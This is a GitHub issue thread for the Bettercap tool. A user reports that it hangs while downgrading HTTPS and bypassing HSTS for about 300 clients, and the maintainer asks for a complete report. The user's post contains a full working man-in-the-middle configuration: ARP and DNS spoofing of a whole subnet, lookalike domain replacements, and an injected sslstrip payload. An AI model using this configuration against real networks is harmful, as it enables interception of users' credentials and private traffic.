### ISSUE TITLE
Bettercap hangs on 300 client

### ISSUE THREAD

**Issue by semsemsami** [bettercap/bettercap#516]
Hi
I use Bettercap version 2.21.1 on Ubuntu 18.10 X64 to downgrade HTTPS to HTTP and HSTS bypass on around 300 client but after 2 minute Bettercap hangs with no data forwarded to client I use 

`set hstshijack.log             /usr/local/share/bettercap/caplets/hstshijack/ssl.log`
`set hstshijack.ignore          *`
`set hstshijack.obfuscate       true`
`set hstshijack.encode          false`
`set hstshijack.custompayloads  *:/root/caplets/hstshijack/payloads/sslstrip.js`
`set hstshijack.payload         /root/caplets/hstshijack/payloads/hstshijack-payload.js`
`set hstshijack.targets         *.com,*.net,*.co,*.iq,*.info,*.org`
`set hstshijack.replacements    *.xcdn,*.nett,*.coo,*.iqq,*.infoo,*.orgg`
`set http.proxy.script     /root/caplets/hstshijack/hstshijack.js`
`set dns.spoof.domains *.xcdn,*.nett,*.coo,*.iqq,*.infoo,*.orgg`
`set arp.spoof.targets 192.168.1.0/24`
`sleep 2`
`http.proxy  on`
`dns.spoof on`
`arp.spoof on`

**Comment by yungtravla** [comment]
Incomplete report so we can't help you.

**Comment by yungtravla** [comment]
please use the issue template https://raw.githubusercontent.com/bettercap/bettercap/master/ISSUE_TEMPLATE.md
